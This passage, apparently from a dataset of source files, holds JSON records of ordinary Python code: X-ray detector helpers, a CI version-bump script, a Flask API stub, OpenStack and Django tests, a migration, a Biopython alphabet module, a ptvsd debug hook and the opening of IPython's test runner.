solid_angs[:] = np.concatenate(list(results))\n solid_angs = solid_angs.reshape(rows, cols)\n mi = solid_angs.min()\n if mi > 0.:\n solid_angs = solid_angs/mi\n\n return solid_angs\n\n\n@memoize\ndef _lorentz_polarization_factor(tth, eta, f_hor, f_vert):\n \"\"\"\n 06/14/2021 SS adding lorentz polarization factor computation\n to the detector so that it can be compenstated for in the\n intensity correction\n\n parameters: tth two theta of every pixel in radians\n eta azimuthal angle of every pixel\n f_hor fraction of horizontal polarization\n (~1 for XFELs)\n f_vert fraction of vertical polarization\n (~0 for XFELs)\n notice f_hor + f_vert = 1\n \"\"\"\n\n theta = 0.5*tth\n\n cth = np.cos(theta)\n sth2 = np.sin(theta)**2\n\n ctth2 = np.cos(tth)**2\n seta2 = np.sin(eta)**2\n ceta2 = np.cos(eta)**2\n\n L = 1./(cth*sth2)\n P = f_hor*(seta2 + ceta2*ctth2) + f_vert*(ceta2 + seta2*ctth2)\n\n return L*P\n\n\ndef _generate_ring_params(tthr, ptth, peta, eta_edges, delta_eta):\n # mark pixels in the spec'd tth range\n pixels_in_tthr = np.logical_and(\n ptth >= tthr[0], ptth <= tthr[1]\n )\n\n # catch case where ring isn't on detector\n if not np.any(pixels_in_tthr):\n return None\n\n # ???: faster to index with bool or use np.where,\n # or recode in numba?\n rtth_idx = np.where(pixels_in_tthr)\n\n # grab relevant eta coords using histogram\n # !!!: This allows use to calculate arc length and\n # detect a branch cut. The histogram idx var\n # is the left-hand edges...\n retas = peta[rtth_idx]\n if fast_histogram:\n reta_hist = histogram1d(\n retas,\n len(eta_edges) - 1,\n (eta_edges[0], eta_edges[-1])\n )\n else:\n reta_hist, _ = histogram1d(retas, bins=eta_edges)\n reta_idx = np.where(reta_hist)[0]\n reta_bin_idx = np.hstack(\n [reta_idx,\n reta_idx[-1] + 1]\n )\n\n # ring arc lenght on panel\n arc_length = angularDifference(\n eta_edges[reta_bin_idx[0]],\n eta_edges[reta_bin_idx[-1]]\n )\n\n # Munge eta bins\n # !!! need to work with the subset to preserve\n # NaN values at panel extents!\n #\n # !!! MUST RE-MAP IF BRANCH CUT IS IN RANGE\n #\n # The logic below assumes that eta_edges span 2*pi to\n # single precision\n eta_bins = eta_edges[reta_bin_idx]\n if arc_length < 1e-4:\n # have branch cut in here\n ring_gap = np.where(\n reta_idx\n - np.arange(len(reta_idx))\n )[0]\n if len(ring_gap) > 0:\n # have incomplete ring\n eta_stop_idx = ring_gap[0]\n eta_stop = eta_edges[eta_stop_idx]\n new_period = np.cumsum([eta_stop, 2*np.pi])\n # remap\n retas = mapAngle(retas, new_period)\n tmp_bins = mapAngle(\n eta_edges[reta_idx], new_period\n )\n tmp_idx = np.argsort(tmp_bins)\n reta_idx = reta_idx[np.argsort(tmp_bins)]\n eta_bins = np.hstack(\n [tmp_bins[tmp_idx],\n tmp_bins[tmp_idx][-1] + delta_eta]\n )\n\n return retas, eta_bins, rtth_idx, reta_idx\n\n\ndef _run_histograms(rows, ims, tth_ranges, ring_maps, ring_params, threshold):\n for i_row in range(*rows):\n image = ims[i_row]\n\n # handle threshold if specified\n if threshold is not None:\n # !!! NaNs get preserved\n image = np.array(image)\n image[image < threshold] = 0.\n\n for i_r, tthr in enumerate(tth_ranges):\n this_map = ring_maps[i_r]\n params = ring_params[i_r]\n if not params:\n # We are supposed to skip this ring...\n continue\n\n # Unpack the params\n retas, eta_bins, rtth_idx, reta_idx = params\n\n if fast_histogram:\n result = histogram1d(retas, len(eta_bins) - 1,\n (eta_bins[0], eta_bins[-1]),\n weights=image[rtth_idx])\n else:\n result, _ = histogram1d(retas, bins=eta_bins,\n weights=image[rtth_idx])\n\n this_map[i_row, reta_idx] = result\n"} {"ext": "py", "sha": "1a302845fac2f234c2c5914432911d45aee47749", "content": "#!/usr/bin/env python3\n\nimport pathlib\nimport fileinput\n\nfrom ci.util import (\n check_env,\n existing_file,\n)\n\nrepo_dir = check_env('REPO_DIR')\neffective_version = check_env('EFFECTIVE_VERSION')\n\ntemplate_file = existing_file(pathlib.Path(repo_dir, 'concourse', 'resources', 'defaults.mako'))\n\nlines_replaced = 0\nstring_to_match = 'tag = '\n\nfor line in fileinput.FileInput(str(template_file), inplace=True):\n if string_to_match in line:\n if lines_replaced != 0:\n raise RuntimeError(f'More than one image tag found in template file')\n leading_spaces = line.index(string_to_match)\n print(f'{leading_spaces * \" \"}{string_to_match}\"{effective_version}\"')\n lines_replaced = 1\n else:\n print(line, end='')\n"} {"ext": "py", "sha": "1a3028b0d17e7d9d5cf5ce08108984d51cafc917", "content": "from oslo_log import log\n\nfrom datetime import datetime\nfrom flask import request, jsonify\nfrom flask_restful import Resource, fields, marshal_with, abort\n\nfrom clapton import db\nfrom clapton.db.sqlalchemy import models\n\nfrom clapton.api import types\n\n\nLOG = log.getLogger(__name__)\n\n\nclass OrderList(Resource):\n def get(self):\n orders = db.get_session().query(models.Order).all()\n return jsonify((types.Order(many=True).dump(orders)).data), 200, {'X-Pagination-Total-Count': 1000}\n\n '''\n response = flask.make_response('[{\"id\": 123}]', 200)\n response.headers.extend({'X-Pagination-Total-Count': 1000,\n 'Content-Type': 'application/json; charset=utf-8'})\n return response\n '''\n return [{\"id\": 123}], 200, {'X-Pagination-Total-Count': 1000}\n\n def post(self):\n '''\n validate request\n parser = reqparse.RequestParser()\n parser.add_argument(\n 'total_amount',\n dest='total_amount',\n type=str,\n location='form', # form, args, headers, cookies, json, files\n required=True,\n help='The orders\\'s total amount',\n )\n args = parser.parse_args(strict=True)\n LOG.debug(args)\n LOG.debug(args.total_amount)\n return {}, 201\n '''\n data = request.get_json()\n if not data:\n return jsonify({'message': 'No imput data provided'}), 400\n data, errors = types.Order().load(data)\n if errors:\n return jsonify(errors), 422\n o = models.Order(id=data['id'])\n return jsonify((types.Order().dump(o)).data), 201\n\n\nclass Order(Resource):\n @marshal_with({'id': fields.String, 'created_at': fields.DateTime, 'links': fields.Nested({'items': fields.Url('items', absolute=True)})})\n def get(self, order_id):\n '''\n outputing format\n '''\n return {'id': 123, 'created_at': datetime.now(), 'links': []}\n\n def put(self, order_id):\n LOG.debug(request.form)\n LOG.debug(request.json)\n LOG.debug(dir(request))\n return {}, 201\n\n def delete(self, order_id):\n abort(500)\n # raise ValueError('haha')\n # raise werkzeug.exceptions.HTTPException(500)\n # raise werkzeug.exceptions.InternalServerError\n return '', 204\n\n\nclass OrderItemList(Resource):\n def get(self, order_id):\n return []\n"} {"ext": "py", "sha": "1a3028f71a48aad11f4b72c7d043f488cd5eb1b1", "content": "# Copyright 2019 Huawei Technologies Co.,LTD.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom unittest import mock\n\nfrom oslo_db import exception as db_exc\n\nfrom cyborg.common import exception\nfrom cyborg import objects\nfrom cyborg.tests.unit.db.base import DbTestCase\nfrom cyborg.tests.unit import fake_deployable\nfrom cyborg.tests.unit import fake_device\nfrom cyborg.tests.unit.objects import test_objects\n\n\nclass TestDeployableObject(DbTestCase):\n\n @property\n def fake_device(self):\n db_device = fake_device.get_fake_devices_as_dict()[2]\n return db_device\n\n @property\n def fake_deployable(self):\n db_deploy = fake_deployable.fake_db_deployable(id=1)\n return db_deploy\n\n @property\n def fake_deployable2(self):\n db_deploy = fake_deployable.fake_db_deployable(id=2)\n return db_deploy\n\n def test_create(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n\n self.assertEqual(db_dpl['uuid'], dpl.uuid)\n\n def test_get(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n dpl_get = objects.Deployable.get(self.context, dpl.uuid)\n self.assertEqual(dpl_get.uuid, dpl.uuid)\n\n def test_get_by_filter(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n query = {\"uuid\": dpl['uuid']}\n dpl_get_list = objects.Deployable.get_by_filter(self.context, query)\n\n self.assertEqual(dpl_get_list[0].uuid, dpl.uuid)\n\n def test_save(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n dpl.num_accelerators = 8\n dpl.save(self.context)\n dpl_get = objects.Deployable.get(self.context, dpl.uuid)\n self.assertEqual(dpl_get.num_accelerators, 8)\n\n def test_destroy(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n self.assertEqual(db_dpl['uuid'], dpl.uuid)\n dpl.destroy(self.context)\n self.assertRaises(exception.ResourceNotFound,\n objects.Deployable.get, self.context,\n dpl.uuid)\n\n\nclass TestDeployableObject(test_objects._LocalTest,\n TestDeployableObject):\n def _test_save_objectfield_fk_constraint_fails(self, foreign_key,\n expected_exception):\n\n error = db_exc.DBReferenceError('table', 'constraint', foreign_key,\n 'key_table')\n # Prevent lazy-loading any fields, results in InstanceNotFound\n deployable = fake_deployable.fake_deployable_obj(self.context)\n fields_with_save_methods = [field for field in deployable.fields\n if hasattr(deployable, '_save_%s' % field)]\n for field in fields_with_save_methods:\n @mock.patch.object(deployable, '_save_%s' % field)\n @mock.patch.object(deployable, 'obj_attr_is_set')\n def _test(mock_is_set, mock_save_field):\n mock_is_set.return_value = True\n mock_save_field.side_effect = error\n deployable.obj_reset_changes(fields=[field])\n deployable._changed_fields.add(field)\n self.assertRaises(expected_exception, deployable.save)\n deployable.obj_reset_changes(fields=[field])\n _test()\n"} {"ext": "py", "sha": "1a3029291fc83c88809f1cd45425b63f1bff23cb", "content": "# from django.test import TestCase\n# from polls.models import Question,Choice\n# from django.utils import timezone\n#\n#\n# # from django.test import Client\n# # Create your tests here.\n# #用来写测试用例\n# # model测试\n# class StudyTestCsse(TestCase):\n# def setUp(self):\n# Question.objects.create(id=1,question_text=\"你的女朋友是谁?\",pub_date=timezone.now())\n#\n# def test_01(self):\n# u'''测试查询问题'''\n# question = Question.objects.get(id=1)\n# self.assertIn(\"你的女朋友是谁?\",question.question_text)\n#\n# def test_02(self):\n# u'''测试创建问题'''\n# Question.objects.create(id=2,question_text=\"今天吃什么?\",pub_date=timezone.now())\n# question = Question.objects.get(id=2)\n# self.assertIn(\"今天吃什么\",question.question_text)\n#\n# def test_03(self):\n# u'''测试更新数据'''\n# question = Question.objects.get(id=1)\n# Question.objects.filter(id=1).update(question_text=\"周末是否加班\")\n# question = Question.objects.get(id=1)\n# self.assertIn(\"周末是否加班\",question.question_text)\n#\n# def test_04(self):\n# u'''测试删除数据'''\n# question = Question.objects.get(id=1)\n# Question.objects.filter(id=1).delete()\n# self.assertEqual(0,len(Question.objects.all()))\n#\n# class choiceTestcase(TestCase):\n#\n# def setUp(self):\n# Question.objects.create(id=1,question_text=\"what's new?\",pub_date=timezone.now())\n# Choice.objects.create(id=1,choice_text='Not Much',votes=0,question_id=1)\n# Choice.objects.create(id=2,choice_text='The sky',votes=0,question_id=1)\n#\n# def test_choice_query(self):\n# u'''测试问题选项查询'''\n# choice = Choice.objects.get(id=1)\n# self.assertEqual(choice.choice_text,\"Not Much\")\n"} {"ext": "py", "sha": "1a30292bc2773def9c2a33301a689783ced66f65", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nfrom django.conf import settings\nimport model_utils.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Dataset',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),\n ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),\n ('dataset', models.FileField(upload_to=b'datasets')),\n ('dimensions', models.PositiveIntegerField(default=0)),\n ('length', models.PositiveIntegerField(default=0)),\n ('filesize', models.PositiveIntegerField(default=0)),\n ('signature', models.CharField(unique=True, max_length=44, blank=True)),\n ('datatype', models.CharField(default=b'csv', max_length=4, choices=[(b'csv', b'csv'), (b'json', b'json'), (b'xml', b'xml')])),\n ('delimiter', models.CharField(default=b',', max_length=1)),\n ('uploader', models.ForeignKey(related_name='datasets', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('-created',),\n 'db_table': 'datasets',\n 'get_latest_by': 'created',\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a302982b0604d6f6f62aa08d229c33367c435e9", "content": "# Copyright 2000-2002 by Andrew Dalke.\n# Revisions copyright 2007-2008 by Peter Cock.\n# All rights reserved.\n# This code is part of the Biopython distribution and governed by its\n# license. Please see the LICENSE file that should have been included\n# as part of this package.\n\n\"\"\"Alphabets used in Seq objects etc to declare sequence type and letters.\n\nThis is used by sequences which contain a finite number of similar words.\n\"\"\"\n\nclass Alphabet:\n size = None # no fixed size for words\n letters = None # no fixed alphabet; implement as a list-like\n # interface,\n def __repr__(self):\n return self.__class__.__name__ + \"()\"\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n Returns a boolean. This relies on the Alphabet subclassing\n hierarchy only, and does not check the letters property.\n This isn't ideal, and doesn't seem to work as intended\n with the AlphabetEncoder classes.\"\"\"\n return isinstance(other, self.__class__)\n\n def _case_less(self):\n \"\"\"Return an case-less variant of the current alphabet (PRIVATE).\"\"\"\n #TODO - remove this method by dealing with things in subclasses?\n if isinstance(self, ProteinAlphabet):\n return generic_protein\n elif isinstance(self, DNAAlphabet):\n return generic_dna\n elif isinstance(self, NucleotideAlphabet):\n return generic_rna\n elif isinstance(self, NucleotideAlphabet):\n return generic_nucleotide\n elif isinstance(self, SingleLetterAlphabet):\n return single_letter_alphabet\n else:\n return generic_alphabet\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n if not self.letters or self.letters==self.letters.upper():\n #Easy case, no letters or already upper case!\n return self\n else:\n #TODO - Raise NotImplementedError and handle via subclass?\n return self._case_less()\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n if not self.letters or self.letters==self.letters.lower():\n #Easy case, no letters or already lower case!\n return self\n else:\n #TODO - Raise NotImplementedError and handle via subclass?\n return self._case_less()\n\ngeneric_alphabet = Alphabet()\n\nclass SingleLetterAlphabet(Alphabet):\n size = 1\n letters = None # string of all letters in the alphabet\n\nsingle_letter_alphabet = SingleLetterAlphabet()\n\n########### Protein\n\nclass ProteinAlphabet(SingleLetterAlphabet):\n pass\n\ngeneric_protein = ProteinAlphabet()\n\n########### DNA\nclass NucleotideAlphabet(SingleLetterAlphabet):\n pass\n\ngeneric_nucleotide = NucleotideAlphabet()\n\nclass DNAAlphabet(NucleotideAlphabet):\n pass\n\ngeneric_dna = DNAAlphabet()\n\n\n########### RNA\n\nclass RNAAlphabet(NucleotideAlphabet):\n pass\n\ngeneric_rna = RNAAlphabet()\n\n\n\n########### Other per-sequence encodings\n\nclass SecondaryStructure(SingleLetterAlphabet):\n letters = \"HSTC\"\n\nclass ThreeLetterProtein(Alphabet):\n size = 3\n letters = [\n \"Ala\", \"Asx\", \"Cys\", \"Asp\", \"Glu\", \"Phe\", \"Gly\", \"His\", \"Ile\",\n \"Lys\", \"Leu\", \"Met\", \"Asn\", \"Pro\", \"Gln\", \"Arg\", \"Ser\", \"Thr\",\n \"Sec\", \"Val\", \"Trp\", \"Xaa\", \"Tyr\", \"Glx\",\n ]\n \n###### Non per-sequence modifications\n\n# (These are Decorator classes)\n\nclass AlphabetEncoder:\n def __init__(self, alphabet, new_letters):\n self.alphabet = alphabet\n self.new_letters = new_letters\n if alphabet.letters is not None:\n self.letters = alphabet.letters + new_letters\n else:\n self.letters = None\n def __getattr__(self, key):\n if key[:2] == \"__\" and key[-2:] == \"__\":\n raise AttributeError(key)\n return getattr(self.alphabet, key)\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (self.__class__.__name__, self.alphabet,\n self.new_letters)\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n This is isn't implemented for the base AlphabetEncoder,\n which will always return 0 (False).\"\"\"\n return 0\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n return AlphabetEncoder(self.alphabet._upper(), self.new_letters.upper())\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n return AlphabetEncoder(self.alphabet._lower(), self.new_letters.lower())\n\n \nclass Gapped(AlphabetEncoder):\n def __init__(self, alphabet, gap_char = \"-\"):\n AlphabetEncoder.__init__(self, alphabet, gap_char)\n self.gap_char = gap_char\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n Returns a boolean. This relies on the Alphabet subclassing\n hierarchy, and attempts to check the gap character. This fails\n if the other alphabet does not have a gap character!\n \"\"\"\n return other.gap_char == self.gap_char and \\\n self.alphabet.contains(other.alphabet)\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n return Gapped(self.alphabet._upper(), self.gap_char.upper())\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n return Gapped(self.alphabet._lower(), self.gap_char.lower())\n\n \nclass HasStopCodon(AlphabetEncoder):\n def __init__(self, alphabet, stop_symbol = \"*\"):\n AlphabetEncoder.__init__(self, alphabet, stop_symbol)\n self.stop_symbol = stop_symbol\n \n def __cmp__(self, other):\n x = cmp(self.alphabet, other.alphabet)\n if x == 0:\n return cmp(self.stop_symbol, other.stop_symbol)\n return x\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n Returns a boolean. This relies on the Alphabet subclassing\n hierarchy, and attempts to check the stop symbol. This fails\n if the other alphabet does not have a stop symbol!\n \"\"\"\n return other.stop_symbol == self.stop_symbol and \\\n self.alphabet.contains(other.alphabet)\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n return HasStopCodon(self.alphabet._upper(), self.stop_symbol.upper())\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n return HasStopCodon(self.alphabet._lower(), self.stop_symbol.lower())\n\n\ndef _get_base_alphabet(alphabet):\n \"\"\"Returns the non-gapped non-stop-codon Alphabet object (PRIVATE).\"\"\"\n a = alphabet\n while isinstance(a, AlphabetEncoder):\n a = a.alphabet\n assert isinstance(a, Alphabet), \\\n \"Invalid alphabet found, %s\" % repr(a)\n return a\n\ndef _ungap(alphabet):\n \"\"\"Returns the alphabet without any gap encoder (PRIVATE).\"\"\"\n #TODO - Handle via method of the objects?\n if not hasattr(alphabet, \"gap_char\"):\n return alphabet\n elif isinstance(alphabet, Gapped):\n return alphabet.alphabet\n elif isinstance(alphabet, HasStopCodon):\n return HasStopCodon(_ungap(alphabet.alphabet), stop_symbol=alphabet.stop_symbol)\n elif isinstance(alphabet, AlphabetEncoder):\n return AlphabetEncoder(_ungap(alphabet.alphabet), letters=alphabet.letters)\n else:\n raise NotImplementedError\n \ndef _consensus_base_alphabet(alphabets):\n \"\"\"Returns a common but often generic base alphabet object (PRIVATE).\n\n This throws away any AlphabetEncoder information, e.g. Gapped alphabets.\n\n Note that DNA+RNA -> Nucleotide, and Nucleotide+Protein-> generic single\n letter. These DO NOT raise an exception!\"\"\"\n common = None\n for alpha in alphabets:\n a = _get_base_alphabet(alpha)\n if common is None:\n common = a\n elif common == a:\n pass\n elif isinstance(a, common.__class__):\n pass\n elif isinstance(common, a.__class__):\n common = a\n elif isinstance(a, NucleotideAlphabet) \\\n and isinstance(common, NucleotideAlphabet):\n #e.g. Give a mix of RNA and DNA alphabets\n common = generic_nucleotide\n elif isinstance(a, SingleLetterAlphabet) \\\n and isinstance(common, SingleLetterAlphabet):\n #This is a pretty big mis-match!\n common = single_letter_alphabet\n else:\n #We have a major mis-match... take the easy way out!\n return generic_alphabet\n if common is None:\n #Given NO alphabets!\n return generic_alphabet\n return common\n\ndef _consensus_alphabet(alphabets):\n \"\"\"Returns a common but often generic alphabet object (PRIVATE).\n\n Note that DNA+RNA -> Nucleotide, and Nucleotide+Protein-> generic single\n letter. These DO NOT raise an exception!\n \n This is aware of Gapped and HasStopCodon and new letters added by\n other AlphabetEncoders. This WILL raise an exception if more than\n one gap character or stop symbol is present.\"\"\"\n base = _consensus_base_alphabet(alphabets)\n gap = None\n stop = None\n new_letters = \"\"\n for alpha in alphabets:\n #Gaps...\n if not hasattr(alpha, \"gap_char\"):\n pass\n elif gap is None:\n gap = alpha.gap_char\n elif gap == alpha.gap_char:\n pass\n else:\n raise ValueError(\"More than one gap character present\")\n #Stops...\n if not hasattr(alpha, \"stop_symbol\"):\n pass\n elif stop is None:\n stop = alpha.stop_symbol\n elif stop == alpha.stop_symbol:\n pass\n else:\n raise ValueError(\"More than one stop symbol present\")\n #New letters...\n if hasattr(alpha, \"new_letters\"):\n for letter in alpha.new_letters:\n if letter not in new_letters \\\n and letter != gap and letter != stop:\n new_letters += letter\n\n alpha = base\n if new_letters:\n alpha = AlphabetEncoder(alpha, new_letters)\n if gap:\n alpha = Gapped(alpha, gap_char=gap)\n if stop:\n alpha = HasStopCodon(alpha, stop_symbol=stop)\n return alpha\n\ndef _check_type_compatible(alphabets):\n \"\"\"Returns True except for DNA+RNA or Nucleotide+Protein (PRIVATE).\n\n This relies on the Alphabet subclassing hierarchy. It does not\n check things like gap characters or stop symbols.\"\"\"\n dna, rna, nucl, protein = False, False, False, False\n for alpha in alphabets:\n a = _get_base_alphabet(alpha)\n if isinstance(a, DNAAlphabet):\n dna = True\n nucl = True\n if rna or protein : return False\n elif isinstance(a, RNAAlphabet):\n rna = True\n nucl = True\n if dna or protein : return False\n elif isinstance(a, NucleotideAlphabet):\n nucl = True\n if protein : return False\n elif isinstance(a, ProteinAlphabet):\n protein = True\n if nucl : return False\n return True\n"} {"ext": "py", "sha": "1a3029c55a3e76194405a448d8cbe490d1fa4940", "content": "\"\"\" Setup remote debugger with Python Tools for Visual Studio (PTVSD)\n\n\"\"\"\nimport os\n\nfrom .celery_log_setup import get_task_logger\n\nREMOTE_DEBUG_PORT = 3000\n\nlog = get_task_logger(__name__)\n\n\ndef setup_remote_debugging(force_enabled: bool = False, *, boot_mode=None) -> None:\n \"\"\" Programaticaly enables remote debugging if SC_BOOT_MODE==debug-ptvsd\n\n \"\"\"\n if \"SC_BOOT_MODE\" not in os.environ:\n log.warning(\"Remote debugging only available when running in a container\")\n return\n\n boot_mode = boot_mode or os.environ.get(\"SC_BOOT_MODE\")\n\n if boot_mode == \"debug-ptvsd\" or force_enabled:\n try:\n log.debug(\"Enabling attach ptvsd ...\")\n #\n # SEE https://github.com/microsoft/ptvsd#enabling-debugging\n #\n import ptvsd\n\n ptvsd.enable_attach(\n address=(\"0.0.0.0\", REMOTE_DEBUG_PORT), redirect_output=True\n ) # nosec\n\n except ImportError:\n log.exception(\"Unable to use remote debugging. ptvsd is not installed\")\n\n else:\n log.info(\"Remote debugging enabled: listening port %s\", REMOTE_DEBUG_PORT)\n else:\n log.debug(\"Booting without remote debugging since SC_BOOT_MODE=%s\", boot_mode)\n\n\n__all__ = [\"setup_remote_debugging\"]\n"} {"ext": "py", "sha": "1a302b90ca158ff107d25b7cdeffb5f9a5e3e5ba", "content": "# -*- encoding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nfrom slack_g_cal.parse import JSON, Datetime\n\n\nclass WitDatetimeContainer(JSON):\n \"\"\" Container wrapping datetime values from the Wit API \"\"\"\n def __init__(self, **dt_json):\n self.is_interval = dt_json['type'] == 'interval'\n # Get rid of values; we don't need this parameter\n dt_json.pop('values', None)\n if self.is_interval:\n from_, to_ = dt_json.pop('from'), dt_json.pop('to')\n self.dt_from = WitDatetime(date_input=from_.value, grain=from_.grain)\n self.dt_to = WitDatetime(date_input=to_.value, grain=to_.grain)\n else:\n self.date = WitDatetime(date_input=dt_json.pop('value'), grain=dt_json.pop('grain'))\n super(WitDatetimeContainer, self).__init__(**dt_json)\n\n\nclass WitDatetime(Datetime):\n def __init__(self, date_input, **dt_json):\n self.grain = dt_json.pop('grain')\n super(WitDatetime, self).__init__(date_input=date_input, **dt_json)\n\n def adjust_grain_by(self, adj_val):\n kwargs = {self.grain: getattr(self._datetime, self.grain) + adj_val}\n self._datetime = self._datetime.replace(**kwargs)\n"} {"ext": "py", "sha": "1a302b9a05e3fe2458365da32681c566fef33e7d", "content": "# -*- coding: utf-8 -*-\n\"\"\"IPython Test Suite Runner.\n\nThis module provides a main entry point to a user script to test IPython\nitself from the command line. There are two ways of running this script:\n\n1. With the syntax `iptest all`. This runs our entire test suite by\n calling this script (with different arguments) recursively. This\n causes modules and package to be tested in different processes, using nose\n or trial where appropriate.\n2. With the regular nose syntax, like `iptest -vvs IPython`. In this form\n the script simply calls nose, but with special command line flags and\n plugins loaded.\n\n\"\"\"\n\n# Copyright (c) IPython Development Team.\n# Distributed under the terms of the Modified BSD License.\n\n\nimport glob\nfrom io import BytesIO\nimport os\nimport os.path as path\nimport sys\nfrom threading import Thread, Lock, Event\nimport warnings\n\nimport nose.plugins.builtin\nfrom nose.plugins.xunit import Xunit\nfrom nose import SkipTest\nfrom nose.core import TestProgram\nfrom nose.plugins import Plugin\nfrom nose.util import safe_str\n\nfrom IPython import version_info\nfrom IPython.utils.py3compat import decode\nfrom IPython.utils.importstring import import_item\nfrom IPython.testing.plugin.ipdoctest import IPythonDoctest\nfrom IPython.external.decorators import KnownFailure, knownfailureif\n\npjoin = path.join\n\n\n# Enable printing all warnings raise by IPython's modules\nwarnings.filterwarnings('ignore', message='.*Matplotlib is building the font cache.*', category=UserWarning, module='.*')\nwarnings.filterwarnings('error', message='.*', category=ResourceWarning, module='.*')\nwarnings.filterwarnings('error', message=\".*{'config': True}.*\", category=DeprecationWarning, module='IPy.*')\nwarnings.filterwarnings('default', message='.*', category=Warning, module='IPy.*')\n\nwarnings.filterwarnings('error', message='.*apply_wrapper.*', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*make_label_dec', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*decorated_dummy.*', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*skip_file_no_x11.*', category=DeprecationWarning, module='.*')\nwarnings.filterwarnings('error', message='.*onlyif_any_cmd_exists.*', category=DeprecationWarning, module='.*')\n\nwarnings.filterwarnings('error', message='.*disable_gui.*', category=DeprecationWarning, module='.*')\n\nwarnings.filterwarnings('error', message='.*ExceptionColors global is deprecated.*', category=DeprecationWarning, module='.*')\n\n# Jedi older versions\nwarnings.filterwarnings(\n 'error', message='.*elementwise != comparison failed and.*', category=FutureWarning, module='.*')\n\nif version_info < (6,):\n # nose.tools renames all things from `camelCase` to `snake_case` which raise an\n # warning with the runner they also import from standard import library. (as of Dec 2015)\n # Ignore, let's revisit that in a couple of years for IPython 6.\n warnings.filterwarnings(\n 'ignore', message='.*Please use assertEqual instead', category=Warning, module='IPython.*')\n\nif version_info < (7,):\n warnings.filterwarnings('ignore', message='.*Completer.complete.*',\n category=PendingDeprecationWarning, module='.*')\nelse:\n warnings.warn(\n 'Completer.complete was pending deprecation and should be changed to Deprecated', FutureWarning)\n\n\n\n# ------------------------------------------------------------------------------\n# Monkeypatch Xunit to count known failures as skipped.\n# ------------------------------------------------------------------------------\ndef monkeypatch_xunit():\n try:\n knownfailureif(True)(lambda: None)()\n except Exception as e:\n KnownFailureTest = type(e)\n\n def addError(self, test, err, capt=None):\n if issubclass(err[0], KnownFailureTest):\n err = (SkipTest,) + err[1:]\n return self.orig_addError(test, err, capt)\n\n Xunit.orig_addError = Xunit.addError\n Xunit.addError = addError\n\n#-----------------------------------------------------------------------------\n# Check which dependencies are installed and greater than minimum version.\n#-----------------------------------------------------------------------------\ndef extract_version(mod):\n return mod.__version__\n\ndef test_for(item, min_version=None, callback=extract_version):\n \"\"\"Test to see if item is importable, and optionally check against a minimum\n version.\n\n If min_version is given, the default behavior is to check against the\n `__version__` attribute of the item, but specifying `callback` allows you to\n extract the value you are interested in. e.g::\n\n In [1]: import sys\n\n In [2]: from IPython.testing.iptest import test_for\n\n In [3]: test_for('sys', (2,6), callback=lambda sys: sys.version_info)\n 